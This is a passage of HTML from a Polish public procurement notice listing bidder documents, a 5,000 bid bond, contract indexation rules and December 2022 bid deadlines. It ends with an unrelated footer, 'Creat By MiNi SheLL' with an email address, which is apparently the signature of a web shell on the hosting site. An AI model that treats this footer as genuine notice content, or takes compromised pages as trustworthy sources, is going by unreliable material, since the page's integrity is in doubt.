stanowiące wstępne potwierdzenie, że podwykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty wymagane przez Zamawiającego do złożenia wraz z ofertą: <br/>1.	Oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu na podst. art. 125 ust. 1 w związku z art. 266 ustawy Pzp,<br/>2.	Informacja dotycząca części zamówienia, której wykonanie wykonawca powierzy Podwykonawcom, <br/>3.	Informacja o nazwie (firmie) Podwykonawcy, jeżeli Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe Podwykonawcy w celu wykazania spełnienia warunków udziału w postępowaniu,<br/>4.	Oświadczenie Wykonawcy dot. RODO,<br/>5.	Dowód wniesienia wadium w kwocie i formie określonej w punkcie 28 specyfikacji.<br/>6.	Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą cenę zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 5000,00 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wprowadzenie zmian do umowy dopuszcza się w sytuacjach określonych w art. 455 ust.1 pkt 4 oraz ust. 2 ustawy Prawo zamówień publicznych<br/>2.	Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>3.	Do każdej propozycji zmiany, inicjujący zmianę przedstawi: <br/>- opis propozycji zmiany, w tym wpływ na terminy wykonania,<br/>- uzasadnienie zmiany,<br/>- obliczenia uzasadniające ewentualną zmianę wynagrodzenia.<br/>4. Zgodnie z art. 439 ustawy Pzp dopuszcza się waloryzację cen jednostkowych netto według wskaźnika wzrostu cen towarów i usług konsumpcyjnych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS. <br/>5. Waloryzacja jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>1.	złożenie pisemnego wniosku przez zainteresowaną stronę, przy czym każda ze stron ma prawo do dwukrotnej w ciągu trwania umowy waloryzacji na swoją korzyść;<br/>2.	upływu sześciu miesięcy od rozpoczęcia realizacji umowy;<br/>3.	zmiany wskaźnika przekraczającej 20 punktów procentowych w stosunku do cen z miesiąca zawarcia umowy<br/>6. Waloryzację przeprowadza się w następujący sposób:<br/>a) stosuje się wskaźnik z najnowszego Biuletynu dostępnego na stronie internetowej GUS na dzień złożenia wniosku;<br/>b) przy pierwszej waloryzacji – w odniesieniu do cen z miesiąca zawarcia umowy<br/>c) przy kolejnej waloryzacji – w odniesieniu do cen z poprzedniej waloryzacji;<br/>6. Każdorazowa waloryzacja polega na zmianie cen o nie więcej niż o ułamek wynoszący 0,5 w stosunku do wysokości wskaźnika zmiany cen, o którym mowa w ust.3. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na Miniportalu Urzędu Zamówień Publicznych oraz w systemie ePUAP (https://epuap.gov.pl/wps/portal). Elektroniczna Skrzynka Podawcza Zamawiającego znajduje się pod adresem: /5bpfvr9721/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com